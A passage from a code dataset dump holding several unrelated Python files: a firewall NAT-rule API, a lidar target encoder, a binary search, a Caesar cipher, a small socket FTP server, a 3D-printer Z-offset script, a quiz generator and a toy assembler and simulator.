source/destination and services can be\n done either using the element href or element defined in element classes\n defined under package ``smc.elements``.\n For example, using networks from :py:class:`smc.elements.network` or \n services from :py:class:`smc.elements.service`.\n\n Example of creating a dynamic source NAT for host 'kali'::\n\n policy = FirewallPolicy('smcpython')\n policy.fw_ipv4_nat_rules.create(name='mynat', \n sources=[Host('kali')], \n destinations='any', \n services='any', \n dynamic_src_nat='1.1.1.1', \n dynamic_src_nat_ports=(1024,65535))\n\n\n Example of creating a static source NAT for host 'kali'::\n\n policy.fw_ipv4_nat_rules.create(name='mynat', \n sources=[Host('kali')], \n destinations='any', \n services='any', \n static_src_nat='1.1.1.1')\n\n Example of creating a destination NAT rule for destination host '3.3.3.3'\n with destination translation address of '1.1.1.1'::\n\n policy.fw_ipv4_nat_rules.create(name='mynat', \n sources='any', \n destinations=[Host('3.3.3.3')], \n services='any', \n static_dst_nat='1.1.1.1')\n\n Destination NAT with destination port translation::\n\n policy.fw_ipv4_nat_rules.create(name='aws_client', \n sources='any', \n destinations=[Alias('$$ Interface ID 0.ip')], \n services='any', \n static_dst_nat='1.1.1.1', \n static_dst_nat_ports=(2222, 22),\n used_on=engine.href)\n\n Create an any/any no NAT rule from host 'kali'::\n\n policy.fw_ipv4_nat_rules.create(name='nonat', \n sources=[Host('kali')], \n destinations='any', \n services='any')\n\n \"\"\"\n typeof = 'fw_ipv4_nat_rule'\n\n def create(self, name, sources=None, destinations=None, services=None,\n dynamic_src_nat=None, dynamic_src_nat_ports=(1024, 65535),\n static_src_nat=None, static_dst_nat=None,\n static_dst_nat_ports=None, is_disabled=False, used_on=None,\n add_pos=None, after=None, before=None, comment=None):\n \"\"\"\n Create a NAT rule.\n\n When providing sources/destinations or services, you can provide the\n element href, network element or services from ``smc.elements``.\n You can also mix href strings with Element types in these fields. \n\n :param str name: name of NAT rule\n :param list sources: list of sources by href or Element\n :type sources: list(str,Element)\n :param list destinations: list of destinations by href or Element\n :type destinations: list(str,Element)\n :param list services: list of services by href or Element\n :type services: list(str,Element)\n :param dynamic_src_nat: str ip or Element for dest NAT\n :type dynamic_src_nat: str,Element\n :param tuple dynamic_src_nat_ports: starting and ending ports for PAT.\n Default: (1024, 65535)\n :param str static_src_nat: ip or element href of used for source NAT\n :param str static_dst_nat: destination NAT IP address or element href\n :param tuple static_dst_nat_ports: ports or port range used for original\n and destination ports (only needed if a different destination port\n is used and does not match the rules service port)\n :param bool is_disabled: whether to disable rule or not\n :param str used_on: href or Element (of security engine) where this\n NAT rule applies, Default: Any\n :type used_on: str,Element\n :param int add_pos: position to insert the rule, starting with position 1. If\n the position value is greater than the number of rules, the rule is inserted at\n the bottom. If add_pos is not provided, rule is inserted in position 1. Mutually\n exclusive with ``after`` and ``before`` params.\n :param str after: Rule tag to add this rule after. Mutually exclusive with ``add_pos``\n and ``before`` params.\n :param str before: Rule tag to add this rule before. Mutually exclusive with ``add_pos``\n and ``after`` params.\n :param str comment: optional comment for the NAT rule\n :raises InvalidRuleValue: if rule requirements are not met\n :raises CreateRuleFailed: rule creation failure\n :return: newly created NAT rule\n :rtype: IPv4NATRule\n \"\"\"\n rule_values = self.update_targets(sources, destinations, services)\n rule_values.update(name=name, comment=comment)\n rule_values.update(is_disabled=is_disabled)\n\n options = LogOptions()\n\n if dynamic_src_nat:\n nat = DynamicSourceNAT(options)\n nat.translated_value = dynamic_src_nat\n nat.translated_ports = (dynamic_src_nat_ports)\n options.update(nat.data)\n rule_values.update(options=options.data)\n \n elif static_src_nat:\n nat = StaticSourceNAT(options)\n nat.translated_value = static_src_nat\n nat.original_value = sources[0].href\n options.update(nat.data)\n rule_values.update(options=options.data)\n\n if static_dst_nat:\n destinations = rule_values['destinations']\n if 'any' in destinations or 'none' in destinations:\n raise InvalidRuleValue('Destination field cannot be none or any for '\n 'destination NAT.')\n destination = Destination()\n destination.add_many(destinations.get('dst'))\n \n nat = StaticDestNAT(options)\n nat.translated_value = static_dst_nat\n nat.original_value = destination.all_as_href()[0]\n if static_dst_nat_ports:\n nat.translated_ports = static_dst_nat_ports\n options.update(nat.data)\n rule_values.update(options=options.data)\n \n if 'options' not in rule_values: # No NAT\n rule_values.update(options=options.data)\n\n rule_values.update(used_on=used_on)\n \n params = None\n href = self.href\n if add_pos is not None:\n href = self.add_at_position(add_pos)\n elif before or after:\n params = self.add_before_after(before, after)\n \n return SubElementCreator(\n self.__class__,\n CreateRuleFailed,\n href=href,\n params=params,\n json=rule_values)\n\n\nclass IPv6NATRule(IPv4NATRule):\n \"\"\"\n Represents an IPv6 NAT rule. Source and/or destination (depending on\n NAT type) should be an IPv6 address. It will be possible to submit\n an IPv4 address however the policy validation engine will fail when\n being deployed to an engine and the rule will be ignored.\n \"\"\"\n typeof = 'fw_ipv6_nat_rule'\n","sub_path":"smc/policy/rule_nat.py","file_name":"rule_nat.py","file_ext":"py","file_size_in_byte":18904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"83388157","text":"import numpy as np\nimport cv2\nfrom data.data_utils.velodyne_points import *\nfrom utils.utils import *\nimport math\nimport os\nimport tensorflow as tf\nfrom data.data_utils.data_reader import *\n\n\ndef get_target(labels, truncated, occlusion, anchors=np.array([3.9, 1.6, 1.5]), input_size=(448, 512), output_size=(112, 128, 35)):\n ratio = input_size[0] // output_size[0]\n ratio = 1\n y_target = np.zeros((output_size[0], output_size[1], 2, 13), np.float32)\n for i in range(len(labels)):\n label_i = np.array(labels[i])\n\n x = int(label_i[0]/ratio)\n y = int(label_i[1]/ratio)\n\n if x >= output_size[0]:\n x = output_size[0] - 1\n if y >= output_size[1]:\n y = output_size[1] - 1\n\n if x < 0 or y < 0:\n continue\n\n # label_i[0:2] = label_i[0:2] / (ratio*1.0)\n label_i[2] = label_i[2] / (output_size[2]*1.)\n ang = label_i[6]\n\n if ang < 0:\n dir_ = 0\n else:\n dir_ = 1\n while ang < 0:\n ang += np.pi\n k = 0\n if (ang > np.pi/4 and ang < (3/4.)* np.pi) or (ang < -np.pi/4 and ang > -(3./4.)* np.pi):\n k = 1\n\n if ang > (3./4.) * np.pi:\n ang -= np.pi\n label_i[6] = ang - k * (np.pi/2)\n label_i = np.append(label_i, [dir_])\n # label_i[6:8] = [math.sin(ang), math.cos(ang)]\n \n anchor = np.array([x+0.5, y+0.5, 0.5, anchors[0], anchors[1], anchors[2]])\n \n label_i[:3] = (label_i[:3] - anchor[:3]) \n label_i[3:6] = np.log(label_i[3:6])\n\n # mins = np.array([-0.5, -0.5, 0, 0.8, 0.3, 0.13, -1.1, -1.1])\n # maxs = np.array([0.5, 0.5, 1, 2.6, 1.4, 0.82, 1.1, 1.1])\n mins = np.array([0, 0, 0, -0.1, -0.1, -0.1, -1.1, -1.1])\n maxs = np.array([0, 0, 0, 3, 2, 2, 1.1, 1.1])\n \n label_i[3:6] = ((label_i[3:6] - mins[3:6]) / (maxs[3:6]-mins[3:6])) * 2 - 1\n z = [0, 0, 0, 0]\n z[occlusion[i]] = 1\n\n y_target[x, y, k, :8] = label_i\n y_target[x, y, k, 8:9] = [1]\n y_target[x, y, k, 9:13] = z\n \n return y_target","sub_path":"src/data/data_utils/target_utils.py","file_name":"target_utils.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"428761220","text":"\"\"\"Binary search algorithm module\"\"\"\n\nfrom typing import Iterable\n\n\ndef bsearch(array: Iterable[int], value: int):\n \"\"\"Binary search algorithm function\n array - the array where the search is performed\n value - what we are looking for\n return: value index\n \"\"\"\n if not array or not value:\n raise ValueError\n array = list(array)\n low = 0\n height = len(array) - 1\n result = None\n while low <= height:\n center = low + (height - low) // 2\n print(height, low, center)\n if value < array[center]:\n height = center - 1\n elif value > array[center]:\n low = center + 1\n else:\n result = center\n break\n return result\n","sub_path":"bsearch.py","file_name":"bsearch.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"466483158","text":"text = input().lower()\niteration = int(input())\n# print(ord('a')) Буквы в цифры\n# print(chr(97), chr(122)) Цифры в буквы\n\ndef crypting(text, iteration):\n crypting = ''\n\n for i in text:\n if i == ' ':\n crypting += ' '\n continue\n \n number = ord(i)\n number += iteration\n\n if number < 97:\n number += 26\n elif number > 122:\n number -= 26\n\n crypting += chr(number)\n return crypting\n\ntotal = crypting(text, -iteration)\n\nprint(total.upper())\n","sub_path":"task-III-3-1.py","file_name":"task-III-3-1.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"491003662","text":"#!/usr/bin/env python3\n# -*- coding=utf-8 -*-\n\"\"\"\n@author:Wllen\n@file:main.py\n@time:2018/8/3 22:48\n\"\"\"\nimport socket\nimport os\nimport struct\nimport json\nfrom conf import settings\nfrom core import auth\n\n\nclass MyServer:\n addr_family = socket.AF_INET # 网络间通讯\n socket_type = socket.SOCK_STREAM # TCP协议\n allow_reuse_address = False\n coding = \"utf-8\"\n\n def __init__(self, server_addr, bind_and_activate=True):\n self.server_addr = server_addr\n self.scoket = socket.socket(self.addr_family, self.socket_type)\n\n if bind_and_activate:\n try:\n self.server_bind()\n self.server_activate()\n except:\n self.server_close()\n raise\n\n def server_bind(self):\n \"\"\"绑定服务端ip和端口,并解决端口重用问题\"\"\"\n if self.allow_reuse_address:\n self.scoket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n # setsockopt(level,optname,value)\n # level定义了哪个选项将被使用。通常情况下是SOL_SOCKET,意思是正在使用的socket选项。\n # SO_REUSEADDR 当socket关闭后,本地端用于该socket的端口号立刻就可以被重用。通常来说,只有经过系统定义一段时间后,\n # 才能被重用。\n # 这里value设置为1,表示将SO_REUSEADDR标记为TRUE,操作系统会在服务器socket被关闭或服务器进程终止后马上释放该服务器\n # 的端口,否则操作系统会保留几分钟该端口。\n self.scoket.bind(self.server_addr)\n self.server_addr = self.scoket.getsockname()\n\n def server_activate(self):\n \"\"\"设置可同时接入数量,无并发时只接入一个,其他等待接入\"\"\"\n self.scoket.listen(settings.REQUEST_QUEUE_SIZE)\n\n def server_close(self):\n \"\"\"关闭socket\"\"\"\n self.scoket.close()\n\n def get_request(self):\n return self.scoket.accept()\n\n def close_request(self, request):\n request.close()\n\n def run(self):\n \"\"\"运行\"\"\"\n while True:\n self.conn, self.client_addr = self.get_request()\n print(\"客户端地址:\", self.client_addr)\n while True:\n try:\n user_struct = self.conn.recv(4)\n if not user_struct: break\n user_len = struct.unpack(\"i\", user_struct)[0]\n user_json = self.conn.recv(user_len).decode(self.coding)\n user_dic = json.loads(user_json)\n print(user_dic)\n user_data = auth.login(user_dic)\n print(\"user_data\", user_data)\n if user_data['auth_status'] == 0:\n self.scoket.send(\"400\".encode(self.coding)) # 400验证通过\n if user_data['auth_status'] == 1:\n print('密码错误')\n self.scoket.send(\"401\".encode(self.coding)) # 401密码错误\n if user_data['auth_status'] == 2:\n print('用户不存在')\n self.scoket.send(\"402\".encode(self.coding)) # 402 用户名不存在\n\n\n\n # head_struct = self.conn.recv(4)\n # head_len = struct.unpack(\"i\", head_struct)[0]\n # head_json = self.conn.recv(head_len).decode(self.coding)\n # head_dic = json.loads(head_json)\n # print(head_dic)\n #\n # cmd = head_dic['cmd']\n # if hasattr(self, cmd): # 发射\n # func = getattr(self, cmd)\n # func(head_dic)\n except Exception:\n break\n\n\ndef entrance():\n servers = MyServer(('127.0.0.1', 8082))\n servers.run()\n","sub_path":"study/module3/homework2/FTP/FtpServer/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"499514137","text":"from OpenFL import FLP, Printer\r\np=Printer.Printer()\r\n\r\n# Initialize first - it seems to increase success rate of the script.\r\n# Initializing stops any operations that are current running,\r\n# and re homes the Z and tilt motors.\r\nprint (\"initializing\")\r\np.initialize()\r\n\r\n# This adds a Z Offset. User will be prompted for an offset value.\r\n# Positive values = build plate closer to vat\r\n# Negative values = build plate further from vat\r\nprint (\"Z offset.\")\r\nprint (\"Positive = down, negative = up\")\r\nx = 0\r\nwhile x == 0:\r\n ZoffsetMirrored = raw_input(\"Enter Z Offset OR Press Enter to Skip:\")\r\n try:\r\n if ZoffsetMirrored != \"\":\r\n print (\"Z Offset will be set to \" + str(ZoffsetMirrored))\r\n Zoffset = (float(ZoffsetMirrored) * (-400.0))\r\n print (\"saving Z Offset to printer\")\r\n blockNum = 0\r\n layer = p.read_block_flp(blockNum)\r\n layer[16] = FLP.ZMove(int(-66924 + Zoffset))\r\n p.write_block(blockNum, layer)\r\n x = 1\r\n else:\r\n x = 1\r\n except ValueError:\r\n print (\"You must enter a number or press Enter to continue\")\r\n continue\r\nif ZoffsetMirrored != \"\":\r\n print(\"Z Offset Set To \" + ZoffsetMirrored)\r\nelse:\r\n print(\"Z Offset Unchanged Because You Chose to Skip\")\r\np.initialize()\r\nexit()\r\n","sub_path":"Community-PythonScripts/Scripts/Deprecated Scripts/ZOffset.py","file_name":"ZOffset.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"299582895","text":"import sys\nimport re\n\nBRANCH_OPS = ['beq', 'bne', 'blt', 'bge']\nALU_OPS = ['sub','subc', 'dec', 'ior', 'or', 'and', 'xor', 'add', 'mov', 'com', 'inc', 'decs', 'lsr', 'lsl', 'clr', 'swap', 'incs']\nLS_OPS = ['lw', 'sw']\nMISC_OPS = ['cmp', 'cmpz', 'cmpc', 'halt', 'setq', 'jumpq', 'rrc', 'rlc', 'setfp', 'cplc', 'clrc']\n\nclass Processor:\n\n def __init__(self, instructions, mem=[]):\n # Initialize all registers\n self.instructions = instructions\n self.memory = [0]*256\n self.PC = 0\n self.regs = [0, 0, 0, 0]\n self.W = 0\n self.FP = 0\n self.Z_flag, self.C_flag = False, False\n\n # Copy the initial memory to our array\n for i in range(len(mem)):\n self.memory[i] = mem[i]\n\n def preprocess(self):\n # Sweep through the list of instructions, removing\n # comments and blank lines and replacing GOTO labels\n # with line numbers.\n labels = dict()\n lines = []\n\n # First pass: get all labels, remove non-instructions from code\n for instr in self.instructions:\n # Remove commented code from line\n line = instr.lower().split('#')[0]\n if re.match(\"^.*:\", line) is not None:\n # If line is a label, add label to dictionary\n label = line.split(':')[0]\n labels[label] = len(lines) - 1\n continue\n # Convert jump into setq+jumpq\n if line.startswith(\"jump \"):\n lines.append(\"setq \" + line.split(\"jump \")[1])\n lines.append(\"jumpq\")\n continue\n # Add line to list of lines\n if line.strip() != \"\":\n lines.append(line)\n \n # Second pass: replace labels with line numbers\n for i in range(len(lines)):\n tokens = lines[i].split()\n if tokens[-1] in labels.keys():\n # If mnemonic is a setq, we just add the label destination\n if tokens[0] == 'setq':\n lines[i] = 'setq ' + str(labels[tokens[-1]])\n elif tokens[0].lower() in BRANCH_OPS:\n offset = labels[tokens[-1]] - i\n lines[i] = tokens[0] + ' ' + str(offset)\n \n # Replace instructions with new instructions\n self.instructions = lines\n \n def assemble_single(self, instr):\n bit_string = \"\"\n ops = instr.replace('$', '').replace(',', '').split()\n # Helper function to convert integer to fixed-width binary\n binary = lambda x, width: format(x, '0{0}b'.format(width))\n\n # Translate instruction according to instruction type\n op = ops[0]\n if op == 'setq':\n # Ensure that literal value is between 0 and 127\n literal = int(ops[1])\n assert literal < 128 and literal >= 0, \"Literal value {0} out of range\".format(literal)\n bit_string = '11' + binary(literal, 7)\n\n elif op in BRANCH_OPS:\n # Add opcode and function code for operation\n bit_string += '10'\n bit_string += {\n 'beq': '00',\n 'bne': '01',\n 'blt': '10',\n 'bge': '11'\n }.get(op, None)\n # Ensure that literal value is between 0 and 31\n offset = int(ops[1])\n assert offset < 32 and offset >= 0, \"Offset value {0} out of range\".format(offset)\n bit_string += binary(offset, 5)\n\n elif op in ALU_OPS:\n # Replace mov ## q/f with movq/movf ##\n if op == 'mov':\n op += ops[2]\n # Add opcode and function code for operation\n bit_string += '00'\n bit_string += {\n 'sub': '0010',\n 'dec': '0011',\n 'ior': '0100',\n 'and': '0101',\n 'xor': '0110',\n 'add': '0111',\n 'movq': '1000',\n 'com': '1001',\n 'inc': '1010',\n 'movf': '1011',\n 'lsl': '1100',\n 'clr': '1101',\n 'lsr': '1110',\n 'subc': '1111'\n }.get(op, None)\n\n # Add destination bit for F or Q\n dest = ops[2]\n assert dest == 'f' or dest == 'q', \"Invalid destination bit {0}\".format(dest)\n bit_string += '0' if dest =='q' else '1'\n # Ensure that literal value is between 0 and 3\n register = int(ops[1])\n assert register < 4 and register >= 0, \"Register value {0} out of range\".format(register)\n bit_string += binary(register, 2)\n\n elif op in LS_OPS:\n bit_string += '01'\n bit_string += '0' if op == 'lw' else '1'\n # Ensure that literal value is between 0 and 8\n offset = int(ops[2])\n assert offset < 16 and offset >= 0, \"Offset value {0} out of range\".format(offset)\n bit_string += binary(offset, 4)\n # Ensure that literal value is between 0 and 3\n register = int(ops[1])\n assert register < 4 and register >= 0, \"Register value {0} out of range\".format(register)\n bit_string += binary(register, 2)\n\n elif op in MISC_OPS:\n bit_string += '00'\n bit_string += {\n 'halt': '0000000',\n 'jumpq': '0000001',\n 'rrc': '0000100',\n 'rlc': '0000101',\n 'cplc': '0000110',\n 'clrc': '0000111',\n 'cmpz': '00010',\n 'cmpc': '00011'\n }.get(op, None)\n # Add register for CMPZ or CMPC\n if op == 'cmpz' or op == 'cmpc':\n # Ensure that literal value is between 0 and 3\n register = int(ops[1])\n assert register < 4 and register >= 0, \"Register value {0} out of range\".format(register)\n bit_string += binary(register, 2)\n\n assert len(bit_string) == 9, \"Assembler error on instruction '{0}' translated as {1}\".format(instr, bit_string)\n #print(bit_string, ' ', instr)\n return bit_string\n\n def assemble(self, filename):\n # Transform instructions into a list of 9-bit binary strings\n self.preprocess()\n bitstr_iter = map(self.assemble_single, self.instructions)\n\n # Print each 9-bit string to file \n with open(filename, 'w') as fout:\n for bitstr in bitstr_iter:\n fout.write(bitstr + '\\n')\n\n def __repr__(self):\n if self.PC < len(self.instructions):\n instr = self.instructions[self.PC]\n instr = instr.split('#')[0]\n # If instruction is \"print\", output memory to stderr\n if instr == \"print\":\n pass #sys.stderr.write(str(self.memory[16:22]) + '\\n')\n else:\n instr = \"---------\"\n return instr\n return \"Instr: {:12s}PC {:03d}, Inst: {:}, Q: {:02x}, R0: {:02x}, R1: {:02x}, R2: {:02x}, R3: {:02x}, Z: {:02x}, C: {:02x}\".format(\n instr,\n self.PC,\n self.assemble_single(instr),\n self.W,\n self.regs[0],\n self.regs[1],\n self.regs[2],\n self.regs[3],\n self.Z_flag,\n self.C_flag\n )\n #return \"PC: {0}\\tInst: {1}\\tRegs: {2}\\tQ: {3}\\tC: {4}\\tZ: {5}\".format(\n # self.PC, instr, self.regs, self.W, self.C_flag, self.Z_flag)\n\n def run_all(self, log='END'):\n self.preprocess()\n while self.PC < len(self.instructions):\n if log == 'EVERY':\n print(self)\n self.run()\n if log != 'NONE':\n print(self)\n print(\"Memory:\\n\", self.memory[:24])\n\n def run(self):\n # Get the operations and operands from the instruction\n instr = self.instructions[self.PC].lower()\n instr = instr.split('#')[0]\n ops = instr.replace('$', '').replace(',', '').split()\n\n # Skip empty lines or comments\n if len(ops) == 0 or ops[0].startswith('#'):\n self.PC += 1\n return\n\n # Call a helper function for the particular instruction type\n op = ops[0]\n if op in BRANCH_OPS:\n self.run_branch(ops)\n elif op in ALU_OPS:\n self.run_alu(ops)\n elif op in LS_OPS:\n self.run_ls(ops)\n elif op in MISC_OPS:\n self.run_misc(ops)\n\n # Update the program counter, even if we branched \n self.PC += 1\n\n def run_branch(self, ops):\n op, offset = ops[0], int(ops[1])\n if ((op == 'beq' and self.Z_flag == True) or\n (op == 'bne' and self.Z_flag == False) or\n (op == 'blt' and self.C_flag == True) or\n (op == 'bge' and self.C_flag == False)):\n \n # Update the program counter\n self.PC += offset\n\n def run_alu(self, ops):\n op, reg, dest = ops[0], int(ops[1]), ops[2]\n f = self.regs[reg]\n result = None\n if op == 'sub':\n result = f - self.W\n self.C_flag = result < 0\n result %= 256\n if op == 'subc':\n result = f - self.W\n if self.C_flag == False:\n self.C_flag = result < 0\n result %= 256\n print(\"subc \", result)\n if op == 'dec':\n result = f - 1\n if op == 'or' or op == 'ior':\n result = f | self.W\n if op == 'and':\n result = f & self.W\n self.C_flag = result > 255\n result = result % 256\n if op == 'xor':\n result = f ^ self.W\n if op == 'add':\n result = f + self.W\n self.C_flag = result > 255\n result %= 256\n if op == 'mov':\n result = f if dest == 'q' else self.W\n if op == 'com':\n result = ~f % 256\n if op == 'inc':\n result = (f + 1) % 256\n if op == 'decs':\n result = (f - 1) % 256\n self.PC += 1\n if op == 'lsl':\n result = f << 1\n self.C_flag = result > 255\n result = result % 256\n if op == 'lsr':\n self.C_flag = f & 1 != 0\n result = f >> 1\n if op == 'clr':\n result = 0\n if op == 'swap':\n result = f << 4 | f >> 4\n if op == 'incs':\n result = f + 1\n self.PC += 1\n \n # Store result of ALU operation to destination,\n # which is W if d == 0 otherwise f\n if dest == 0 or dest == 'q':\n self.W = result\n else:\n self.regs[reg] = result\n\n def run_ls(self, ops):\n op, reg, offset = ops[0], int(ops[1]), int(ops[2])\n if op == 'lw':\n # Load value from memory into accumulator\n self.W = self.memory[self.regs[reg] + offset]\n print(self.memory[:8])\n elif op == 'sw':\n # Store value from accumulator into memory\n self.memory[self.regs[reg] + offset] = self.W\n print(self.memory[:8])\n\n def run_misc(self, ops):\n if ops[0] == 'cmp':\n print(\"Deprecated command, CMP\")\n if ops[0] == 'cmpc':\n f = self.regs[int(ops[1])]\n self.C_flag = f < self.W\n elif ops[0] == 'cmpz':\n f = self.regs[int(ops[1])]\n self.Z_flag = self.W == f\n elif ops[0] == 'halt':\n self.PC = len(self.instructions)\n elif ops[0] == 'setq':\n self.W = int(ops[1])\n elif ops[0] == 'jumpq':\n self.PC = self.W\n elif ops[0] == 'rlc':\n self.W = (self.W << 1) + (1 if self.C_flag else 0)\n self.C_flag = self.W > 255\n self.W %= 256\n elif ops[0] == 'rrc':\n new_carry = self.W & 1 == 1\n self.W = (self.W >> 1) + (128 if self.C_flag else 0)\n self.C_flag = new_carry\n elif ops[0] == 'setfp':\n self.FP = self.W\n elif ops[0] == 'cplc':\n self.C_flag = not (self.C_flag)\n print(\"invert\")\n elif ops[0] == 'clrc':\n self.C_flag = False\n\ndef test(filename, mem=[], log='EVERY'):\n with open(filename, 'r') as file:\n lines = [l.strip() for l in file]\n proc = Processor(lines, mem=mem)\n proc.run_all(log=log)\n return proc\n'''\ndef test_sqrt():\n results = dict()\n for n in range(65536):\n n1, n0 = n / 256, n % 256\n expected = int(n**0.5)\n mem = [0]*16 + [n1, n0]\n proc = test('squareroot.s9', mem=mem, log='END')\n results[n] = proc.memory[18]\n error = 0\n for input, actual in results.items():\n expected = input**0.5\n if abs(expected - actual) > 1:\n error += 1\n print(\"Input: {0}, Expected: {1}, Actual: {2}\".format(\n input, expected, actual\n ))\n print(\"Error: {0}/{1}\".format(error, len(results)))\n\ntest_sqrt()\n'''\nmem = [1, 129, 6, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 23, 112, 0]\nif len(sys.argv) == 1:\n print(\"Don't forget a filename!\")\nelif len(sys.argv) == 2:\n test(sys.argv[1], mem=mem)\nelif len(sys.argv) == 3:\n with open(sys.argv[1], 'r') as file:\n lines = [l.strip() for l in file]\n proc = Processor(lines, mem=mem)\n proc.assemble(sys.argv[2])\n","sub_path":"lab4/runasm.py","file_name":"runasm.py","file_ext":"py","file_size_in_byte":11608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"287063708","text":"import math\nfrom proteus import Domain\n\ndef beachBakhtyar3d(L=[8.5,1.0,0.8],\n Lb=3.5):\n boundaries=['left','right','bottom','top','front','back','obstacle']\n boundaryTags=dict([(key,i+1) for (i,key) in enumerate(boundaries)])\n vertices=[[0.0,0.0,0.0],#0\n [Lb,0.0,0.0],#1\n [L[0],0.0,0.5],#2\n [L[0],0.0,L[2]],#3\n [0.0,0.0,L[2]],#4\n [0.0,L[1],0.0],#5\n [Lb,L[1],0.0],#6\n [L[0],L[1],0.5],#7\n [L[0],L[1],L[2]],#8\n [0.0,L[1],L[2]]]#9\n vertexFlags=[boundaryTags['left'],#0\n boundaryTags['bottom'],#1\n boundaryTags['right'],#2\n boundaryTags['right'],#3\n boundaryTags['left'],#4\n boundaryTags['left'],#5\n boundaryTags['bottom'],#6\n boundaryTags['right'],#7\n boundaryTags['right'],#8\n boundaryTags['left']]#9\n facets=[[[0,1,2,3,4]],\n [[0,4,9,5]],\n [[2,3,8,7]],\n [[3,4,9,8]],\n [[0,1,6,5]],\n [[1,2,7,6]],\n [[5,6,7,8,9]]]\n facetFlags=[boundaryTags['front'],\n boundaryTags['left'],\n boundaryTags['right'],\n boundaryTags['top'],\n boundaryTags['bottom'],\n boundaryTags['bottom'],\n boundaryTags['back']]\n domain = Domain.PiecewiseLinearComplexDomain(vertices=vertices,\n vertexFlags=vertexFlags,\n facets=facets,\n facetFlags=facetFlags)\n #go ahead and add a boundary tags member \n domain.boundaryTags = boundaryTags\n return domain\n\nif __name__=='__main__':\n import os\n domain = beachBakhtyar3d()\n #domain.writeAsymptote(\"beachBakhtyar3d\")\n domain.writePoly(\"beachBakhtyar3d\")\n domain.writePLY(\"beachBakhtyar3d\")\n #os.system(\"asy -V beachBakhtyar3d\")\n","sub_path":"benchmarks/sacramentoLevee/beachBakhtyar3dDomain.py","file_name":"beachBakhtyar3dDomain.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"404652257","text":"import pandas as pd\nimport json\ndangshi_raw=pd.read_excel(\"dangshi.xlsx\")\nxinzhongguo_raw=pd.read_excel(\"xinzhongguo.xlsx\")\ngaigekaifang_raw=pd.read_excel(\"gaigekaifang.xlsx\")\nfazhanshi_raw=pd.read_excel(\"fazhanshi.xlsx\")\nout={}\nout[\"dangshi\"]=[]\nout[\"xinzhongguo\"]=[]\nout[\"gaigekaifang\"]=[]\nout[\"fazhanshi\"]=[]\nfor i in range(0,len(dangshi_raw)):\n t={}\n t[\"question\"]=dangshi_raw['problem'][i]\n t[\"option\"]={}\n t[\"option\"][\"A\"]=dangshi_raw['cha'][i]\n t[\"option\"][\"B\"]=dangshi_raw['chb'][i]\n t[\"option\"][\"C\"]=dangshi_raw['chc'][i]\n t[\"true\"]=dangshi_raw['real'][i]\n t[\"type\"]=1\n t[\"scores\"]=10\n t['checked']=False\n out[\"dangshi\"].append(t)\nfor i in range(0,len(xinzhongguo_raw)):\n t={}\n t[\"question\"]=xinzhongguo_raw['problem'][i]\n t[\"option\"]={}\n t[\"option\"][\"A\"]=xinzhongguo_raw['cha'][i]\n t[\"option\"][\"B\"]=xinzhongguo_raw['chb'][i]\n t[\"option\"][\"C\"]=xinzhongguo_raw['chc'][i]\n t[\"true\"]=xinzhongguo_raw['real'][i]\n t[\"type\"]=1\n t[\"scores\"]=10\n t['checked']=False\n out[\"xinzhongguo\"].append(t)\nfor i in range(0,len(gaigekaifang_raw)):\n t={}\n t[\"question\"]=gaigekaifang_raw['problem'][i]\n t[\"option\"]={}\n t[\"option\"][\"A\"]=gaigekaifang_raw['cha'][i]\n t[\"option\"][\"B\"]=gaigekaifang_raw['chb'][i]\n t[\"option\"][\"C\"]=gaigekaifang_raw['chc'][i]\n t[\"true\"]=gaigekaifang_raw['real'][i]\n t[\"type\"]=1\n t[\"scores\"]=10\n t['checked']=False\n out[\"gaigekaifang\"].append(t)\n\nfor i in range(0,len(fazhanshi_raw)):\n t={}\n t[\"question\"]=fazhanshi_raw['problem'][i]\n t[\"option\"]={}\n t[\"option\"][\"A\"]=fazhanshi_raw['cha'][i]\n t[\"option\"][\"B\"]=fazhanshi_raw['chb'][i]\n t[\"option\"][\"C\"]=fazhanshi_raw['chc'][i]\n t[\"true\"]=fazhanshi_raw['real'][i]\n t[\"type\"]=1\n t[\"scores\"]=10\n t['checked']=False\n out[\"fazhanshi\"].append(t)\n\nout_all=json.dumps(out,ensure_ascii=False,indent=4)\nwith open(\"test.json\",'w') as fs:\n fs.write(out_all)\nprint(out_all)","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"6334921","text":"import time\n\nfrom cycle_dating.Utilities import use_data as ud, series\nfrom cycle_dating.Algos import optim_virtual\nfrom cycle_dating.Algos.Utilities.LinkedList import LinkedList\n\n\nclass Node:\n \"\"\"\n defines a node, which will be used to store a value in the heap\n actual values are stored in the linked list. the node accesses the\n element in the linked list via the link variable\n comparison operators are also defined for convenience\n \"\"\"\n __slots__ = [\"link\"]\n def __init__(self, link):\n self.link = link\n def __le__(self, other):\n return self.link.val <= other\n def __lt__(self, other):\n return self.link.val < other\n def __ge__(self, other):\n return self.link.val >= other\n def __gt__(self, other):\n return self.link.val > other\n def __eq__(self, other):\n return self.link.val == other\n def __ne__(self, other):\n return not (self.link.val == other)\n\nclass BU(optim_virtual.Optim):\n \"\"\"\n Class implementation for BSA-BU algorithm\n\n Args:\n dim (int): Number of buy-sell points, K\n long (bool): True if long sequence if buy-sell points is required\n trans_cost (float): transaction cost\n from_hierarch (bool): True if instance is used in hierarchical method, False if not\n \"\"\"\n def 